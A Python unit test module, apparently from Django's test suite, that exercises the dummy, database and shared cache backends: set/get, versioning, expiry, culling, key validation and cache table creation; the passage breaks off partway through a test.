import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core import signals
from django.core.cache import cache, caches, CacheKeyWarning, DEFAULT_CACHE_ALIAS
from django.db import connection, connections, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (TestCase, TransactionTestCase, RequestFactory,
override_settings)
from django.test.signals import setting_changed
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
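# For example, custom_key_func('answer', 'prefix', 2) returns 'CUSTOM-prefix-2-answer'.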
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
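# For instance, caches_setting_for_tests(base={'BACKEND': 'b'}, LOCATION='loc')
# resolves the 'v2' alias to {'BACKEND': 'b', 'VERSION': 2, 'LOCATION': 'loc'}:
# params override _caches_setting_base, which in turn overrides base.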
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
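        # 60 * 60 * 24 * 30 = 2,592,000 seconds; memcached treats any timeout above
        # this threshold as an absolute unix timestamp rather than a relative offset.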
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
